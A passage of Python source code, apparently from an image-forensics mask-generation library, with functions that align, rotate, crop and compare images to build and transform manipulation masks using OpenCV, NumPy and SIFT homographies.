grid_z = griddata(np.array(dst_pts),
np.array(src_pts), (grid_x, grid_y), method='cubic', rescale=True)
map_x = np.append([], [ar[:, 0] for ar in grid_z])
map_y = np.append([], [ar[:, 1] for ar in grid_z])
default_x = np.append([], [ar for ar in grid_x])
default_y = np.append([], [ar for ar in grid_y])
# remove remaps outside the mask
map_x[long == 0] = default_x[long == 0]
map_y[long == 0] = default_y[long == 0]
# fix nan's with no mapping
jj = np.where(np.isnan(map_x))
map_x[jj] = default_x[jj]
jj = np.where(np.isnan(map_y))
map_y[jj] = default_y[jj]
map_x_32 = map_x.astype('float32').reshape(mask.shape)
map_y_32 = map_y.astype('float32').reshape(mask.shape)
return cv2.remap(img, map_y_32, map_x_32, cv2.INTER_NEAREST)
def __grid(img1, img2, compositeMask, edgeMask=None, arguments=None):
"""
Compute sparse maps from points between img1 to img2
:param img1:
:param img2:
:param mask1:
:param mask2:
@type img1: ImageWrapper
@type img2: ImageWrapper
:return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix
"""
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=edgeMask, mask2=None, arguments=arguments)
if src_dts_pts is None:
return compositeMask
newMask = _remap(compositeMask, edgeMask,
[[x[0][1], x[0][0]] for x in src_dts_pts[0].astype('int')],
[[x[0][1], x[0][0]] for x in src_dts_pts[1].astype('int')])
# r = np.zeros(r.shape).astype('uint8')
# for x in range(len(src_dts_pts[1])):
# cv2.line(r,tuple(src_dts_pts[0][x][0]),tuple(src_dts_pts[1][x][0]),255)
# r[int(x[0][1]),int(x[0][0])] = 255
return newMask
def __sift(img1, img2, mask1=None, mask2=None, arguments=None):
"""
Compute homography to transfrom img1 to img2
Apply the mask to each in order to only compare relevent regions of images
:param img1:
:param img2:
:param mask1:
:param mask2:
@type img1: ImageWrapper
@type img2: ImageWrapper
:return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix
"""
arguments = dict(arguments)
homography = arguments['homography'] if arguments is not None and 'homography' in arguments else 'RANSAC-4'
if homography in ['None', 'Map']:
return None, None
elif homography in ['All'] and 'homography max matches' in arguments:
# need as many as possible
arguments.pop('homography max matches')
src_dts_pts = getMatchedSIFeatures(img1, img2, mask1=mask1, mask2=np.asarray(mask2), arguments=arguments)
if src_dts_pts is not None:
new_src_pts = src_dts_pts[0]
new_dst_pts = src_dts_pts[1]
matches = None
if homography == 'LMEDS':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.LMEDS)
elif homography == 'All':
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts)
elif homography.find('-') > 0:
try:
RANSAC_THRESHOLD = float(homography[homography.find('-') + 1])
except:
RANSAC_THRESHOLD = 10.0
if matches is None:
M1, matches = cv2.findHomography(new_src_pts, new_dst_pts, cv2.RANSAC, RANSAC_THRESHOLD)
matchCount = np.sum(matches)
if float(matchCount) / len(src_dts_pts) < 0.15 and matchCount < 30:
return None, None
return M1, matchCount
return None, None
def applyResizeComposite(compositeMask, shape, interpolation=2):
"""
Resize the composite mask
:param compositeMask:
:param transform_matrix:
:return:
"""
newMask = np.zeros(shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 1024
newLevelMask = cv2.resize(levelMask, (shape[1], shape[0]),interpolation=interpolation)
newMask[newLevelMask > 300] = level
return newMask
class Flipper:
def __init__(self, mask, flip):
self.mask = mask
self.flipdirection = flip
self.region = boundingRegion(mask)
def _lcs(self, alist, blist):
"""
:param alist
:param blist:
:return:
"""
m = len(alist)
n = len(blist)
counter = [[0] * (n + 1) for x in range(m + 1)]
longest = 0
lcs_set = (0, 0)
for i in range(m):
for j in range(n):
if alist[i] == blist[j]:
c = counter[i][j] + 1
counter[i + 1][j + 1] = c
if c > longest:
lcs_set = (i, j)
longest = c
return lcs_set, longest
def flip(self, compositeMask):
flipped = compositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]]
flipped = cv2.flip(flipped,
1 if self.flipdirection == 'horizontal' else (-1 if self.flipdirection == 'both' else 0))
flipCompositeMask = np.zeros(self.mask.shape).astype('uint8')
flipCompositeMask[self.region[0][1]:self.region[1][1], self.region[0][0]:self.region[1][0]] = flipped
return flipCompositeMask
def applyFlipComposite(compositeMask, mask, flip):
"""
Since SIFT Cannot flip
Flip the selected area
:param compositeMask:
:param mask:
:param flip:
:return:
"""
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
flipper = Flipper(maskInverted, flip)
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
def work(levelMask):
flipCompositeMask = flipper.flip(levelMask)
return (flipCompositeMask + levelMask * maskAltered).astype('uint8')
return applyToComposite(compositeMask,work)
def applyToComposite(compositeMask, func, shape=None):
"""
Loop through each level add apply the function.
Need to convert levels to 0 and unmapped levels to 255
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
"""
newMask = np.zeros(shape if shape is not None else compositeMask.shape).astype('uint8')
for level in list(np.unique(compositeMask)):
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 255
newLevelMask = func(levelMask)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyGridTransformCompositeImage(compositeMask, startIm, destIm, edgeMask=None, arguments={}):
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
arguments = dict(arguments)
if 'homography max matches' in arguments:
arguments.pop('homography max matches')
levels = list(np.unique(compositeMask))
for level in levels:
if level == 0:
continue
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 255
newlevelmask = __grid(startIm, destIm, levelMask, edgeMask=255 - edgeMask, arguments=arguments)
if newlevelmask is not None:
newMask[newlevelmask > 100] = level
return newMask
def applyInterpolateToCompositeImage(compositeMask, startIm, destIm, edgeMask, inverse=False, arguments={},
defaultTransform=None,
withMask = False):
"""
Loop through each level add apply SIFT to transform the mask
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
@type destIm: ImageWrapper
@type startIm: ImageWrapper
"""
newMask = np.zeros((destIm.image_array.shape[0], destIm.image_array.shape[1]), dtype=np.uint8)
if 'homography' in arguments and arguments['homography'] == 'Map':
return applyGridTransformCompositeImage(compositeMask,
startIm,
destIm,
edgeMask=edgeMask,
arguments=arguments)
if 'homography' in arguments and arguments['homography'] == 'None':
return compositeMask
levels = list(np.unique(compositeMask))
flags = cv2.WARP_INVERSE_MAP if inverse else cv2.INTER_LINEAR
borderValue = 0
for level in levels:
if level == 0:
continue
if defaultTransform is None or (
'composite homography' in arguments and arguments['composite homography'] == 'Multiple'):
levelMask = np.zeros(compositeMask.shape).astype('uint8')
levelMask[compositeMask == level] = 200
TM, matchCountResult = __sift(startIm, destIm, mask1=levelMask, mask2=invertMask(ImageWrapper(edgeMask)), arguments=arguments)
else:
TM = defaultTransform
levelMask = np.zeros(compositeMask.shape).astype('uint16')
levelMask[compositeMask == level] = 8000
if TM is None:
newLevelMask = cv2.resize(levelMask, (destIm.size[0], destIm.size[1]))
elif withMask:
newLevelMask = applyTransform(levelMask,
mask=edgeMask,
transform_matrix=TM,
invert=inverse,
shape=(destIm.size[1], destIm.size[0]))
else:
newLevelMask = cv2.warpPerspective(levelMask, TM, (destIm.size[0], destIm.size[1]),
flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=borderValue)
if newLevelMask is not None:
newMask[newLevelMask > 100] = level
return newMask
def applyRotateToCompositeImage(img, angle, pivot):
"""
Loop through each level add apply the rotation.
Need to convert levels to 0 and unmapped levels to 255
:param img:
:param angle:
:param pivot:
:return:
"""
from functools import partial
func = partial(rotateImage, angle, pivot)
return applyToComposite(img, func, shape=img.shape)
def applyTransformToComposite(compositeMask, mask, transform_matrix, shape=None, returnRaw=False):
"""
Loop through each level add apply the transform.
Need to convert levels to 0 and unmapped levels to 255
:param compositeMask:
:param mask:
:param transform_matrix:
:return:
"""
from functools import partial
func = partial(applyTransform, mask=mask, transform_matrix=transform_matrix, shape=shape, returnRaw=returnRaw)
return applyToComposite(compositeMask, func, shape=shape)
def applyPerspectiveToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpPerspective(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyAffineToComposite(compositeMask, transform_matrix, shape):
def perspectiveChange(composite_mask, M=None, shape=None):
return cv2.warpAffine(composite_mask, M, (shape[1], shape[0]))
from functools import partial
func = partial(perspectiveChange, M=transform_matrix, shape=shape)
return applyToComposite(compositeMask, func, shape=shape)
def applyRotateToComposite(rotation, compositeMask, edgeMask, expectedDims, local=False):
"""
Loop through each level add apply the rotation.
Need to convert levels to 0 and unmapped levels to 255
:param rotation:
:param compositeMask:
:param edgeMask:
:param expectedDims:
:param local
:return:
"""
from functools import partial
if local:
func = partial(__localrotateImage, rotation, edgeMask, expectedDims=expectedDims, cval=255)
else:
func = partial(__rotateImage, rotation, expectedDims=expectedDims, cval=255)
return applyToComposite(compositeMask, func, shape=expectedDims)
def isHomographyOk(transform_matrix, h, w):
# convert cornore to homogenous coordinates
ll = np.array([0, 0, 1])
ul = np.array([0, w, 1])
lr = np.array([h, 0, 1])
ur = np.array([h, w, 1])
if transform_matrix.shape == (2,3):
transform_matrix = np.vstack([transform_matrix,[0,0,1.0]])
a_ll = np.matmul(transform_matrix, ll)
a_ul = np.matmul(transform_matrix, ul)
a_ur = np.matmul(transform_matrix, ur)
a_lr = np.matmul(transform_matrix, lr)
# convert points to lines
a = np.cross(a_ll, a_ul)
b = np.cross(a_lr, a_ur)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_vertical = intersection_point_projective[0] / intersection_point_projective[2]
x_vertical = intersection_point_projective[1] / intersection_point_projective[2]
a = np.cross(a_ul, a_ur)
b = np.cross(a_ll, a_lr)
# find point of intersection
intersection_point_projective = np.cross(a, b)
if intersection_point_projective[2] == 0:
return False
y_horizontal = intersection_point_projective[0] / intersection_point_projective[2]
x_horizontal = intersection_point_projective[1] / intersection_point_projective[2]
# if the resulting lines intersect inside the box, fail
return not (0 <= x_vertical <= w and 0 <= y_vertical <= h) and not (
0 <= x_horizontal <= w and 0 <= y_horizontal <= h)
# Or is more appropriate to look at the hull of the shape.
# point = Point(x,y)
# points = [(d[0] / d[2], d[1] / d[2]) for d in [a_ll,a_ul,a_ur,a_lr]]
##polygon = Polygon(points).convex_hull
# return not polygon.contains(point)
def applyTransform(compositeMask, mask=None, transform_matrix=None, invert=False, returnRaw=False, shape=None):
"""
Ceate a new mask applying the transform to only those parts of the
compositeMask that overlay with the provided mask.
:param compositeMask:
:param mask: 255 for unmanipulated pixels
:param transform_matrix:
:param invert:
:param returnRaw: do merge back in the composite
:return:
"""
flags = cv2.WARP_INVERSE_MAP if invert else cv2.INTER_LINEAR # +cv2.CV_WARP_FILL_OUTLIERS
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
compositeMaskFlipped = compositeMask
# resize only occurs by user error.
if compositeMaskFlipped.shape != maskInverted.shape:
compositeMaskFlipped = cv2.resize(compositeMaskFlipped, (maskInverted.shape[1], maskInverted.shape[0]))
compositeMask = cv2.resize(compositeMask, (maskInverted.shape[1], maskInverted.shape[0]))
if shape is None:
shape = mask.shape
# zeros out areas outside the mask
compositeMaskAltered = compositeMaskFlipped * maskInverted
maxvalue = compositeMaskAltered.max()
compositeMaskAltered[compositeMaskAltered > 0] = maxvalue-20
if transform_matrix.shape[0] == 2:
newMask = cv2.warpAffine(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
else:
newMask = cv2.warpPerspective(compositeMaskAltered, transform_matrix, (shape[1], shape[0]), flags=flags,
borderMode=cv2.BORDER_CONSTANT, borderValue=0)
newMask[newMask > 99] = maxvalue
newMask[newMask < 100] = 0
# put the areas outside the mask back into the composite
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
if returnRaw:
return newMask
newMask = newMask | compositeMask * maskAltered
return newMask
def cropResize(img,location, wh):
img_crop = img[location[0]:wh[0],location[1]:wh[1],:]
return cv2.resize(img_crop, (img.shape[1],img.shape[0]))
def cropResizeCompare(img1, img2, arguments=dict()):
width_and_height = (int(arguments['crop width']), int(arguments['crop height']))
pre_resize_img = cv2.resize(img2, width_and_height)
return composeCropImageMask(img1, pre_resize_img, location=None)
def cropCompare(img1, img2, arguments=dict()):
from maskgen.image_wrap import ImageWrapper
if (sum(img1.shape) > sum(img2.shape)):
img1_m, img2_m = __alignChannels(ImageWrapper(img1), ImageWrapper(img2))
analysis = {'shape change': sizeDiff(ImageWrapper(img1_m), ImageWrapper(img2_m))}
location = getValue(arguments,'location',None)
if type(location) == str:
location = toIntTuple(location)
mask, analysis_d = composeCropImageMask(img1_m, img2_m,location=location)
analysis.update(analysis)
return mask, analysis_d
return None, {}
def _composeLCS(img1, img2):
from scipy import sparse
m = img1.shape[0] * img1.shape[1]
n = img2.shape[0] * img2.shape[1]
LCS = sparse.lil_matrix((m + 1, n + 1), dtype=np.int8)
# that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1]
for i in xrange(1, m + 1, 1):
for j in xrange(1, n + 1, 1):
x1 = (i - 1) % img1.shape[0]
y1 = (i - 1) / img1.shape[0]
x2 = (j - 1) % img2.shape[0]
y2 = (j - 1) / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
LCS[i, j] = LCS[i - 1, j - 1] + 1
else:
m = max(LCS[i - 1, j], LCS[i, j - 1])
if m > 0:
LCS[i, j] = m
# Start from the right-most-bottom-most corner and
# one by one store characters in lcs[]
i = m - 1
j = n - 1
mask = np.zeros(img1.shape, dtype=np.uint8)
while i >= 0 and j >= 0:
x1 = i % img1.shape[0]
y1 = i / img1.shape[0]
x2 = j % img2.shape[0]
y2 = j / img2.shape[0]
if img1[x1, y1] == img2[x2, y2]:
mask[x1, y1] = 255
i -= 1
j -= 1
# If not same, then find the larger of two and
# go in the direction of larger value
elif LCS[i - 1, j] > LCS[i, j - 1]:
i -= 1
else:
j -= 1
def __search1(pixel, img2, tally, endx, endy, x, y):
from collections import deque
def __addToQueue(x, y, endx, endy, queue):
if x > endx:
queue.append((x - 1, y))
if y > endy:
queue.append((x, y - 1))
if x > endx:
queue.append((x - 1, y - 1))
pixel2 = img2[x, y]
if pixel == pixel2:
return (x, y)
queue = deque()
__addToQueue(x, y, endx, endy, queue)
while len(queue) > 0:
x, y = queue.popleft()
pixel2 = img2[x, y]
if pixel == pixel2:
return x, y
if tally[x, y] == 0:
__addToQueue(x, y, endx, endy, queue)
return None
def __search(pixel, img2, tally, position, depth):
startx = min(max(0, position[0] - depth[0]), img2.shape[0])
starty = min(max(0, position[1] - depth[1]), img2.shape[1])
endx = min(position[0] + depth[0], img2.shape[0]) + 1
endy = min(position[1] + depth[1], img2.shape[1]) + 1
imgbox = img2[startx:endx, starty:endy]
image_positions = zip(*np.where(imgbox == pixel))
if len(image_positions) > 0:
tallybox = tally[startx:endx, starty:endy]
tallypostions = zip(*np.where(tallybox > 0))
if len(tallypostions) > 0:
maxtally = max(tallypostions)
image_positions = [p for p in image_positions if p > maxtally]
else:
return None
if len(image_positions) > 0:
best = min(image_positions)
return startx + best[0], starty + best[1]
return None
def _tallySeam(img1, img2, minDepth=50):
tally1 = np.zeros(img1.shape)
tally2 = np.zeros(img2.shape)
depth_x = max(img2.shape[0] - img1.shape[0], minDepth)
depth_y = max(img2.shape[1] - img1.shape[1], minDepth)
for x1 in range(img1.shape[0]):
for y1 in range(img1.shape[1]):
pos = __search(img1[x1, y1], img2, tally2, (x1, y1), (depth_x, depth_y))
if pos is not None:
tally1[x1, y1] = 1
tally2[pos[0], pos[1]] = 1
return tally1.astype('uint8') * 255
def rotateCompare(img1, img2, arguments=dict()):
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
local = (arguments['local'] == 'yes') if 'local' in arguments else False
if img1.shape == img2.shape:
mask1, analysis1 = __diffMask(img1, img2, False, args=arguments)
if abs(rotation) < 0.0001:
return mask1, analysis1
mask2, analysis2 = __compareRotatedImage(rotation, img1, img2, arguments)
diff = sumMask(mask1) - sumMask(mask2)
return (mask1, analysis1) if diff < 0 or local else (mask2, analysis2)
else:
return __compareRotatedImage(rotation, img1, img2, arguments)
def resizeImage(img1, shape, interpolation):
name_map = {
'bicubic': cv2api.cv2api_delegate.inter_cubic,
'nearest': cv2api.cv2api_delegate.inter_nn,
'bilinear': cv2api.cv2api_delegate.inter_linear,
'cubic': cv2api.cv2api_delegate.inter_cubic,
'mesh': cv2api.cv2api_delegate.inter_area,
'lanczos': cv2api.cv2api_delegate.inter_lanczos
}
inter_val = name_map[interpolation] if interpolation in name_map else cv2api.cv2api_delegate.inter_nn
return cv2.resize(img1, (shape[1], shape[0]), interpolation=inter_val)
def resizeCompare(img1, img2, arguments=dict()):
new_img2 = resizeImage(img2,
img1.shape,
arguments['interpolation'] if 'interpolation' in arguments else 'nearest')
return __diffMask(img1, new_img2, False, args=arguments)
def moving_average(a, n=3):
ret = np.cumsum(a, dtype=float)
ret[n:] = ret[n:] - ret[:-n]
return ret[n - 1:] / n
def morphologyCompare(img_one, img_two, arguments= {}):
kernel_size = int(getValue(arguments, 'kernel', 3))
kernel = np.ones((kernel_size, kernel_size), np.uint8)
diff = (np.abs(img_one - img_two)).astype('uint16')
mask = np.sum(diff, 2)
difference = float(arguments['tolerance']) if arguments is not None and 'tolerance' in arguments else 0.00390625
difference = difference * 256
mask[np.where(mask < difference)] = 0
if getValue(arguments, 'distribute_difference', False):
mask = 255*mask.astype(np.double)/(np.max(mask)-difference)
mask = mask.astype('uint8')
else:
# set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
mask = cv2.morphologyEx(mask,cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)# filter out noise in the mask
return mask, {}
def mediatedCompare(img_one, img_two, arguments={}):
morphologyOps = {'open':cv2.MORPH_OPEN, 'close':cv2.MORPH_CLOSE}
morphology_order = getValue(arguments, 'morphology order', 'open:close').split(':')
gain = int(getValue(arguments, 'gain', 0))
kernel_size=int(getValue(arguments, 'kernel',3))
weight = int(getValue(arguments, 'weight', 1.0))
smoothing = int(getValue(arguments, 'smoothing', 3))
algorithm = getValue(arguments, 'filling', 'morphology')
aggregate = getValue(arguments, 'aggregate', 'max')
kernel = np.ones((kernel_size, kernel_size), np.uint8)
max_threshold = int(getValue(arguments, 'maximum threshold', 255))
from scipy import signal
# compute diff in 3 colors
if aggregate == 'luminance':
min_threshold = int(getValue(arguments, 'minimum threshold', 3))
img_one = cv2.cvtColor(img_one.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
img_two = cv2.cvtColor(img_two.astype('uint8'), cv2.COLOR_BGR2YCR_CB)
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16')))
mask = diff[:, :, 0] + (diff[:, :, 2] + diff[:, :, 1])/weight
bins = 256 + 512/weight
else:
min_threshold = int(getValue(arguments, 'minimum threshold', 0))
diff = (np.abs(img_one.astype('int16') - img_two.astype('int16'))).astype('uint16')
if aggregate == 'max':
mask = np.max(diff, 2) # use the biggest difference of the 3 colors
bins=256
elif aggregate == 'sum':
mask = np.sum(diff, 2)
bins=768
else:
mask = np.mean(diff, 2)
bins = 256
hist, bin_edges = np.histogram(mask, bins=bins, density=False)
if smoothing > 0:
hist = moving_average(hist,n=smoothing) # smooth out the histogram
minima = signal.argrelmin(hist, order=1) # find local minima
size = minima[0].size
minima = minima[0][0] if size > 0 else 0
else:
size = 0
minima = min_threshold
if size == 0 or minima > bins/2: # if there was no minima, hardcode
threshold = min_threshold
else:
threshold = max(min_threshold,min(minima, max_threshold)) # Use first minima
threshold += gain
mask[np.where(mask <= threshold)] = 0 # set to black if less than threshold
mask[np.where(mask > 0)] = 255
mask = mask.astype('uint8')
if algorithm == 'morphology':
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[0]], kernel)
mask = cv2.morphologyEx(mask, morphologyOps[morphology_order[1]], kernel)
elif algorithm == 'median':
mask = cv2.medianBlur(mask, kernel_size) # filter out noise in the mask
return mask, {'threshold': threshold, 'hist': hist, 'diff':diff}
def getExifDimensionsFromData(exif_meta, crop=False):
heights = ['Cropped Image Height', 'AF Image Height', 'Image Height', 'Exif Image Height', ] if crop else [
'Image Height', 'Exif Image Height']
widths = ['Cropped Image Width', 'AF Image Width', 'Image Width', 'Exif Image Width', ] if crop else ['Image Width',
'Exif Image Width']
height_selections = [(exif_meta[h] if h in exif_meta else None) for h in heights]
width_selections = [(exif_meta[w] if w in exif_meta else None) for w in widths]
if 'png:IHDR.width,height' in exif_meta:
try:
w, h = [int(x.strip()) for x in exif_meta['png:IHDR.width,height'].split(',')]
height_selections.append(h)
width_selections.append(w)
except:
pass
return [(int(height_selections[p]), int(width_selections[p]))
for p in range(len(width_selections)) if
height_selections[p] is not None and width_selections[p] is not None]
def getExifDimensions(filename, crop=False):
from maskgen import exif
return getExifDimensionsFromData(exif.getexif(filename))
def convertCompare(img1, img2, arguments=dict()):
analysis = {}
if 'Image Rotated' in arguments and arguments['Image Rotated'] == 'yes':
if 'source filename' in arguments:
orienation = exif.getOrientationFromExif((arguments['source filename']))
analysis.update(exif.rotateAnalysis(orienation))
img1 = exif.rotateAccordingToExif(img1, orienation,counter=True)
else:
# assumes crop, but this approach should be improved to use HOG comparisons
# since some of these conversions occur with Raw images
rotation, mask = __findRotation(img1, img2, [0, 90, 180, 270])
analysis.update({'rotation': rotation})
return 255 - mask, analysis
if 'source filename' in arguments and img1.shape != img2.shape:
# see if there is crop information in exif
dims_crop = getExifDimensions(arguments['source filename'], crop=True)
dims = getExifDimensions(arguments['source filename'], crop=False)
if len(dims_crop) > 0 and len(dims) > 0 and dims_crop[0] != dims[0]:
analysis['Crop'] = 'yes'
if img1.shape != img2.shape:
diff_shape = (int(img1.shape[0] - img2.shape[0]) / 2, int(img1.shape[1] - img2.shape[1]) / 2)
#keep in mind that alterMask, used for composite generation, assumes 'crop' occurs first, followed
# by final adjustments for size
if 'location' not in arguments:
diff_shape= (max(1,diff_shape[0]),max(1,diff_shape[1]))
else:
diff_shape = toIntTuple(arguments['location'])
if getValue(arguments, 'Crop','yes') == 'no':
new_img1 = img1
else:
new_img1 = img1[diff_shape[0]:-diff_shape[0], diff_shape[1]:-diff_shape[1]]
new_img2 = cv2.resize(img2, (new_img1.shape[1], new_img1.shape[0]))
if getValue(arguments, 'Crop', 'yes') == 'yes':
analysis['location'] = str(diff_shape)
mask, a = __diffMask(new_img1, new_img2, False, args=arguments)
else:
mask, a = __diffMask(img1, img2, False, args=arguments)
analysis.update(a)
return mask, analysis
def __composeMask(img1_wrapper, img2_wrapper, invert, arguments=dict(), alternativeFunction=None, convertFunction=None):
"""
:param img1:
:param img2:
:param invert:
:param arguments:
:param alternativeFunction:
:param convertFunction:
:return:
@type img1_wrapper: ImageWrapper
@type img2_wrapper: ImageWrapper
@type arguments: dict
@rtype numpy.ndarray,dict
"""
img1, img2 = __alignChannels(img1_wrapper,
img2_wrapper,
convertFunction=convertFunction)
args = {}
args.update(arguments)
args['source filename'] = img1_wrapper.filename
args['target filename'] = img2_wrapper.filename
if alternativeFunction is not None:
try:
mask, analysis = alternativeFunction(img1, img2, arguments=args)
removeValue(analysis, 'arguments.source filename')
removeValue(analysis, 'arguments.target filename')
if mask is not None:
return mask if not invert else 255 - mask, analysis, None
except ValueError as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, str(e)
# rotate image two if possible to compare back to image one.
# The mask is not perfect.
mask = None
error = None
rotation = float(arguments['rotation']) if 'rotation' in arguments else 0.0
analysis = {}
if abs(rotation) > 0.0001:
mask, analysis = __compareRotatedImage(rotation, img1, img2, arguments)
if sum(img1.shape) > sum(img2.shape):
mask, analysis = composeCropImageMask(img1, img2)
if sum(img1.shape) < sum(img2.shape):
mask, analysis = __composeExpandImageMask(img1, img2)
if mask is None:
try:
if img1.shape != img2.shape and \
img1.shape[1] == img2.shape[0] and \
img1.shape[0] == img2.shape[1]:
arguments['Image Rotated'] = 'yes'
mask, analysis = convertCompare(img1, img2, arguments)
else:
mask, analysis = __diffMask(img1, img2, False, args=arguments)
except Exception as e:
logging.getLogger('maskgen').error('Mask generation failure ' + str(e))
logging.getLogger('maskgen').info('Arguments ' + str(arguments))
mask = np.zeros(img1.shape, dtype=np.uint8)
analysis = {}
return abs(255 - mask).astype('uint8') if invert else mask, analysis, error
def __alignShape(im, shape):
x = min(shape[0], im.shape[0])
y = min(shape[1], im.shape[1])
z = np.zeros(shape)
for d in range(min(shape[2], im.shape[2])):
z[0:x, 0:y, d] = im[0:x, 0:y, d]
return z
def __resize(img, dimensions):
if img.shape[0] != dimensions[0]:
diff = abs(img.shape[0] - dimensions[0])
img = np.concatenate((np.zeros((diff / 2, img.shape[1])), img), axis=0)
img = np.concatenate((img, np.zeros((diff - (diff / 2), img.shape[1]))), axis=0)
if img.shape[1] != dimensions[1]:
diff = abs(img.shape[1] - dimensions[1])
img = np.concatenate((np.zeros((img.shape[0], diff / 2)), img), axis=1)
img = np.concatenate((img, np.zeros((img.shape[0], diff - (diff / 2)))), axis=1)
return img
def rotateImage(angle, pivot, img):
padX = [img.shape[1] - pivot[1], pivot[1]]
padY = [img.shape[0] - pivot[0], pivot[0]]
imgP = np.pad(img, [padY, padX], 'constant')
if abs(angle) % 90 == 0:
imgR = np.rot90(imgP, int(angle / 90)).astype('uint8')
else:
try:
imgR = np.asarray(Image.fromarray(imgP).rotate(angle))
except:
imgR = ndimage.rotate(imgP, angle, cval=0, reshape=False, mode='constant').astype('uint8')
return imgR[padY[0]: -padY[1], padX[0]: -padX[1]]
def __localrotateImage(rotation, mask, img, expectedDims=None, cval=0):
maskInverted = ImageWrapper(np.asarray(mask)).invert().to_array()
maskInverted[maskInverted > 0] = 1
targetDims = img.shape
if expectedDims is not None:
targetDims = expectedDims
x0,y0,w,h = widthandheight(maskInverted)
if w == 0 or h == 0:
return img
h = min(h+1, targetDims[0])
w = min(w+1, targetDims[1])
subImg = img[y0:(y0+h),x0:(x0+w)]
center = (h /2, w / 2)
M = cv2.getRotationMatrix2D(center, rotation, 1.0)
rotatedSubMask = cv2.warpAffine(subImg*maskInverted[y0:(y0+h),x0:(x0+w)], M, (w,h),flags=cv2api.cv2api_delegate.inter_linear)
rotatedMask = np.zeros(mask.shape)
rotatedMask[y0:y0+h,x0:x0+w] = rotatedSubMask
maskAltered = np.copy(mask)
maskAltered[maskAltered > 0] = 1
return (rotatedMask + img * maskAltered).astype('uint8')
def __rotateImage(rotation, img, expectedDims=None, cval=0):
expectedDims = expectedDims if expectedDims is not None else (img.shape[0], img.shape[1])
rotNorm = int(rotation / 90) if (rotation % 90) == 0 else None
rotNorm = rotNorm if rotNorm is None or rotNorm >= 0 else (4 + rotNorm)
npRotation = rotNorm is not None and img.shape == (expectedDims[1], expectedDims[0])
if npRotation:
res = np.rot90(img, rotNorm)
else:
res = ndimage.interpolation.rotate(img, rotation, cval=cval, reshape=(img.shape != expectedDims), order=0)
if (res.shape[0],res.shape[1]) != expectedDims:
res = cv2.resize(res,(expectedDims[1],expectedDims[0]))
return res
def __compareRotatedImage(rotation, img1, img2, arguments):
if rotation != 0:
res = __rotateImage(rotation, img1, expectedDims=img2.shape, cval=img2[0, 0])
else:
res = img1
mask, analysis = __composeExpandImageMask(res, img2) if res.shape != img2.shape else __diffMask(res,
img2,
False,
args=arguments)
if rotation != 0:
res = __rotateImage(-rotation, mask, expectedDims=img1.shape, cval=255)
else:
res = mask
return res, analysis
def __findRotation(img1, img2, range):
best = 0
r = None
best_mask = None
for rotation in range:
res, analysis = __compareRotatedImage(rotation, img1, img2, {})
c = np.sum(res)
if c > best or best_mask is None:
best = c
best_mask = res
r = rotation
return r, best_mask
# res = __resize(mask,(max(img2.shape[0],img1.shape[0]), max(img2.shape[1],img1.shape[1])))
# res[res<0.00001] = 0
# res[res>0] = 255
# # now crop out the rotation difference, to make sure the original image is not modified
# if img1.shape != res.shape:
# diff = (res.shape[0]-img1.shape[0], res.shape[1]-img1.shape[1])
# diff = (diff[0] if diff[0] > 0 else 0, diff[1] if diff[1] > 0 else 0)
# res = res[diff[0]/2:res.shape[0]-((diff[0]/2) -diff[0]),diff[1]/2:res.shape[1]-((diff[1]/2) - diff[1])]
def extractAlpha(rawimg1, rawimg2):
"""
If rawimg2 has an alpha channel, then the pixels then the high alpha value is the pixels that did not change
:param rawimg1:
:param rawimg2:
:return:
"""
img2_array = rawimg2.to_array()
img1_array = rawimg1.to_array()
ii16 = np.iinfo(np.uint16)
if len(img2_array.shape) == 3 and img2_array.shape[2] == 4:
img2_array = img2_array[:, :, 3]
if len(img2_array.shape) == 2:
all = np.zeros((img2_array.shape[0], img2_array.shape[1])).astype('uint16')
all[img2_array == 0] = ii16.max
return np.zeros((img1_array.shape[0], img1_array.shape[1])).astype('uint16'), all
return rawimg1.to_16BitGray().to_array(), rawimg2.to_16BitGray().to_array()
def convert16bitcolor(rawimg1, rawimg2):
return rawimg1.to_array().astype('int16'), rawimg2.to_array().astype('int16')
def __alignChannels(rawimg1, rawimg2, convertFunction=None):
"""
:param rawimg1:
